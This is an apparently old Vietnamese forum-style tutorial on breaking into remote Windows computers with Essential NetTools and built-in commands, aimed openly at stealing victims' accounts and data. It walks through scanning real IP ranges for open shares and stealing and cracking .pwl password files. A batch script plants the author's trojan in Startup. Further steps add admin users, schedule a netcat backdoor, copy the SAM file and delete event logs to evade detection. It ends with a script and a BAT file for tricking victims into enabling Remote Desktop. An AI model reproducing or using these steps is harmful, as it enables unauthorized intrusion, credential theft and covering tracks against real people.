Xâm nhập máy tính thông qua Essential NetTools 4.2

Đây là công cụ thiết yếu cho các bạn muốn thâm nhập vào các máy tính từ xa. 


                                                                     tải nhanh

Hướng Dẫn:
Sau khi cài đặt mở ENT3 lên, trong tab NBScan gõ vào Starting IP Address một trong số những cổng sau : 203.162.50.1; 203.162.11.1; 203.162.46.1; 203.162.49.1; 203.162.60.1; 202.167.126.1; 202.167.120.1. Khi đó ở dòng Ending IP Address sẽ có dạng như sau; ***.***.xx.255

 - Click vô Start, Trên màn hình sẽ hiện ra những máy nằm trong vùng địa chỉ trên, nếu có chữ yes ở phần RS thì những máy đó có thể đột nhập vào được (NẾU MAY MẮN)(Những máy có thể vào thường có Workgroup là workgroup hoặc tên gì đó mà nghe có vẻ ngu ngu , đừng động vào máy có workgoup là DOMAIN hay SERVER)

- Click chuột phải vào máy ngu ngu đó rồi chọn Open Computer, rồi đó bây giờ bạn đã ngồi trong máy victim rồi muốn làm gì thì làm.



CHÔM PASSWORD PHỤC VỤ HỌC SINH SINH VIÊN NGHÈO

1. Làm tương tự như trên nhưng sau khi open computer được rùi thì close cái cửa sổ đó lại, sau đó click chuột phải vào các máy có chữ YES rồi chọn copy IP Address sau đó qua tab Shares trong phần Share name gõ vào \\***.***.xx.***\c\, trong phần Local drive chọn B (ổ nào cũng đươc), click vô Mount (chú ý nếu hiện lên thông báo “the network not starting….” thì phải qua tab NBScan chọn thằng victim đó rồi Open computer đợi cho đến khi hiện lên phần share của victim là được rồi có thể close nó lại, qua tab shares click Mount nếu hiện lên connect successfully thì OK rồi.

Bây giờ ổ B trên máy bạn đã là ổ C của máy victim rùi đó

DÙNG WINDOWS COMMANDER
1. Mở Windows Commander lên chọn ổ H, khà khà thằng vivtim đang dãy chết(bi giờ ổ C của nó là ổ B của mình rùi), vô Commandsà Search, trong search for type vô *.pwl, trong search in type H:\windowsà click Start search đợi cho ra mấy file *.pwl là stop ngay có đợi lâu cũng chẳng được gìà click vô feed to listbox, rồi đó bi giờ nó đã nằm trong listbox của mình, nhấn F5 để copy nó qua ổ cứng của mình vd: D:\ACC . XONG

2. Khi đã có file pwl trong tay bạn click vô nó(file pwl nằm trên ổ cứng của mình) (kiếm file nào mới nhất) thằng PWL tools demo sẽ nhảy ra làm phận sự của mình click vô SearchPasswordFast hì hì có ACC xài rùi(nhớ post lên cho anh em đấy nhé), nếu không có gì hihi chịu khó search tiếp file system.ini trong C:\windows (user name nằm trong này đó) type user name vừa tìm được vào phần user name của PWL Tools demo 6.5 àclick checkpassàok

3. Nếu bạn có trojan hãy copy vào thư mục starup

4. Cách này nhanh gấp 3 lần so với kiểu open computer đó J

DÙNG TẬP TIN ACC.BAT

Cách này cực kỳ nhanh gọn nhưng đòi hỏi phải biết chút ít về dos và .bat

Bạn tạo tập tin acc.bat có nội dung như sau :
copy d:\acc\system.ini h:\windows\system.ini d:\acc\system.ini
copy h:\windows\*.pwl d:\acc

copy c:\windows\desktop\msconfigs.exe H:\WINDOWS\Startm~1\Programs\StartUp


msconfigs là con trojan của tui. Sau khi connect successfully bạn chỉ cần chạy acc.bat là tất cả đêu ok. Đó ai hiểu thì xài cách này nhanh gấp 6 lần so với cái kiểu open computer


Chú ý: Tôi không chịu trách nhiệm về những gì mà bài viết này gây ra


Nhớ là phải có trình đọc file PWL

Món này phù hợp cho việc đánh nhanh rút gọn, rề rà làm chậm luôn dàn máy victim 

Bổ sung:
Xâm nhập vào máy tính của Victim đang Online bằng chương trình Essential NetTools : - Đầu tiên các bạn phải Download chương trình Essential NetTools (http://www.all-nettools.com/ent3.zip) : 
Essential Net Tools 3.0 và *** của nó 
Rồi thực hiện các bước sau : 
+ Giải nén files Essential Net Tools 3.0.zip bằng các công cụ giải nén như : 
Winzip, Winrar... 
Download tại : http://www.winzip.com/ 
Bước 1 : Thiết lập cấu hình 
- Bạn vào trong Control Panel rồi vào Network 
- Click vào nút Add rồi chọn phần Client 
- Tiếp tục nhấn nút Add. Rồi chọn phần Microsoft 
- Chọn phần Client for Microsoft Network 
- Cuối cùng là OK 
Bước 2 : Bắt đầu xâm nhập 
+ Ngay phần NBscan 
ngay phần" Starting IP": 
Đánh vào IP của bạn. Để biết số IP của bạn thì vào Start --> Run rồi gõ : "winipcfg" 
VD : 
203.162.11.1 
hoặc : 
202.167.122.1 
Còn phần Ending Ip : 
203.162.11.255 
hoặc : 
202.167.122.225 
+ Sau đó click chuột vào nút Start 
+ Chờ sau giây lát ! 
Nó sẽ xuất hiện danh sách IP sau khi dò tìm ! 
+Ngay phần RS: 
No : là không có xâm nhập vào được 
Yes: là xâm nhập được (nhưng đôi khi thì không) 
+ Nhấp chuột phải vào hàng mà có chữ "Yes" 
- Nhấp vào phần "Open Computer" 
+ Và sau đó các bạn có thể xâm nhập vào máy của victim được nhưng cũng có thể có mấy cái máy không xâm nhập vào được ! Nhưng đột nhập để làm gì ? 
Chúng ta đột nhập để ăn cắp Acount và dữ liệu của victim ! 
Ắn cắp Password bằng cách lấy files PWL của victim trong : 
C:/window/*.PWL 
Rồi dùng công cụ PWL Tool để đọc được file đó Các lệnh cơ bản xâm nhập máy tính 
Phần 1 : Net 

chỉ cần bạn có được User và Passwords của một IP nào trên Net...thế là bồ có thể kết nói một IPC$ rỗng rồi đấy.... 

bây giờ tớ xin ví dụ là bạn có được User la hbx và passwords : 123456...IP : 127.0.0.1 

cậu hãy mở trình Ms dos và gõ vào lệnh sau : 

Net use \\127.0.0.1\ipc$ "123456" /user:"hbx" đẩ kết nồi một IPC$ rỗng với máy victtim 

nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dụng 

------------------------- 

bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới nghe... 

chúng ta cộng thệm môt user mới là heibai và password lovechina 

Net user heibai lovechina / add 

nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator 

Net Localgroup Adminstrator heibai / add 

------------------------- 

trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer 

Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ ) 

Z là của mình...còn C$ là của Victim 


Phần 2 : AT 

thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,....vậy khi copy trojan lên máy rồi...làm thế nào dể khới động nó đây ? 

chúng ta phải dùng đến lệnh AT thôi..... 

đầu tiên...chúng ta cần biết thời gian của đối phương 

Net time \\127.0.0.1 

bây giờ thì nó sẽ phản hồi thời gian của victim...vd : 12:0 .. 
tiếp theo..chúng ta cần tạo môt homework ID = 1 

AT \\127.0.0.1 12:3 nc.exe 

ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi * giới thiệu chút it về NC...NC là từ viết tắc của NETCAT....nó là một telnet server với port 99 

đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút 


phần 3 : Telnet 

đây là một lệnh rất cần thiết khi xâm nhập máy tính...nó có thể kết nối vớ máy tính khắc từ xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok 

Telnet 127.0.0.1 99 

thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh... 


Phần 4 : Copy 

bây giờ chúng ta nói tiêp...làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại....nhưng bạn phải có kết nối IPC$ cái đã.... 

chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1 

Copy Index.html \\127.0.0.1\C$\index.html 

nếu bạn copy lên folder winNt 

Copy index.html \\127.0.0.1\admin$\index.html 

muốn copy files trên máy victm thì bạn gõ vào : 

Copy \\127.0.0.1\Admin$\repair\sam._c:\ 


phần 5 : Set 

nếu bạn muốn *** một website......tất nhiến là phải mở port 80..nếu không thì cậu *** cho ai xem ? 

đã tới lúc dùng lệnh Set rồi 

sau đây là kết quả mà tớ tìm thấy......chúng ta phân tích nghe....chủ yếu là muốn biêt homepage nó ở đâu thôi..... 

COMPUTERNAME=PENTIUMII 
ComSpec=D:\WINNT\system32\cmd.exe 
CONTENT_LENGTH=0 
GATEWAY_INTERFACE=CGI/1.1 
HTTP_ACCEPT=*/* 
HTTP_ACCEPT_LANGUAGE=zh-cn 
HTTP_CONNECTION=Keep-Alive 
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate 
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) 
NUMBER_OF_PROCESSORS=1 
Os2LibPath=D:\WINNT\system32\os2\dll; 
OS=Windows_NT 
Path=D:\WINNT\system32;D:\WINNT 
PATHEXT=.COM;.EXE;.BAT;.CMD 
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE， CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86 
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel 
PROCESSOR_LEVEL=6 
PROCESSOR_REVISION=0303 
PROMPT=$P$G 
QUERY_STRING=/c+set 
REMOTE_ADDR=XX.XX.XX.XX 
REMOTE_HOST=XX.XX.XX.XX 
REQUEST_METHOD=GET 
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe 
SERVER_NAME=XX.XX.XX.XX 
SERVER_PORT=80 
SERVER_PORT_SECURE=0 
SERVER_PROTOCOL=HTTP/1.1 
SERVER_SOFTWARE=Microsoft-IIS/3.0 
SystemDrive=D: 
SystemRoot=D:\WINNT 
TZ=GMT-9 
USERPROFILE=D:\WINNT\Profiles\Default User 
windir=D:\WINNT 

đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở ảâ ? khi cậu Dir ..chắc chắn là sẽ View được rất nhiều files đấy`..... 

phần 6 : Nbtstat 

nếu cậu Scan đuợc một máy sữ dụng Winnt...open port 135-139...thế thì bồ phải dùng lệnh này để biết thêm user thôi... 

* tiện thể xin nói luôn...đây là netbios....sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi 

Nbtstat - A XXX.XXX.XXX.XXX 

sau đây là kết quả tớ scan được..... 

NetBIOS Remote Machine Name Table 

Name Type Status 
--------------------------------------------- 
Registered Registered Registered Registered Registered Registered Registered Reg 
istered Registered Registered Registered 
MAC Address = 00-E0-29-14-35-BA 
PENTIUMII <00> UNIQUE 
PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP 
ORAHOTOWN <1C> GROUP 
ORAHOTOWN <1B> UNIQUE 
PENTIUMII <03> UNIQUE 
INet~Services <1C> GROUP 
IS~PENTIUMII...<00> UNIQUE 
ORAHOTOWN <1E> GROUP 
ORAHOTOWN <1D> UNIQUE 
..__MSBROWSE__.<01> GROUP 

kết quả cho biết User là PENTIUMII。 
phần 7 : Shutdown 

nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt 

Shutdown \\127.0.0.1 t:20 

20 giây sau...Winnt sẽ tự khời động lại.......hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này....vì nó sẽ làm tổn thất rất nặng cho victim...hãy làm tay hacker có đạo đức 


phần 8 : Dir.... 

lệnh này không có gì để nói hết..chỉ dùng để view thôi................. 


phần 9 : Del 

lệnh này giống như xoá nhật ký vậy đó.....khi chúng ta xâm nhập máy tình...trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi...chư muốn bị tóm cổ hả ? 

sau đây là những files nhật ký của Winnt 

del C:\winnt\system32\logfiles\*.* 
del C:\winnt\ssytem32\config\*.evt 
del C:\winnt\system32\dtclog\*.* 
del C:\winnt\system32\*.log 
del C:\winnt\system32\*.txt 
del C:\winnt\*.txt 
del C:\winnt\*.log

BỔ SUNG 2:
(http://virusvn.com/forum/archive/index.php/t-273.html)
Ý tưởng
1 con virus sau khi đc kích hoạt trên PC của Victim sẽ :
+ Tạo 1 username và gán username đó vào Localgroup Administrators
+ Thiết lập dọn đường để ta kết nối Remote Desktop từ xa
enable Remote Desktop

/////////////////////////////////////////////////////////////////
Option Explicit
Dim WSHShell, n, MyBox, p, t, mustboot, errnum, vers
Dim enab, disab, jobfunc, itemtype
Set WSHShell = WScript.CreateObject("WScript.Shell")
p = "HKLM\SYSTEM\CurrentControlSet\Control\Termina l Server\"
p = p & "fDenyTSConnections"
itemtype = "REG_DWORD"
Err.Clear
On Error Resume Next
n = WSHShell.RegRead (p)
On Error Goto 0
errnum = Err.Number
if errnum <> 0 then
WSHShell.RegWrite p, 0, itemtype
End If
If n = 0 Then
n = 1
WSHShell.RegWrite p, n, itemtype
ElseIf n = 1 then
n = 0
WSHShell.RegWrite p, n, itemtype
End If
////////////////////////////////////////////////////////////

• TẢI VỀ

Tóm lại:
1 : Biết IP internet của người đó
2 : Dụ họ RUN 1 file BAT có nội dung
net user khigiadano matkhau /add
net localgroup administrators khigiadano /add
netsh firewall set service remotedesktop enable(lệnh này thay code trên)

Phần Mềm Liên Quan: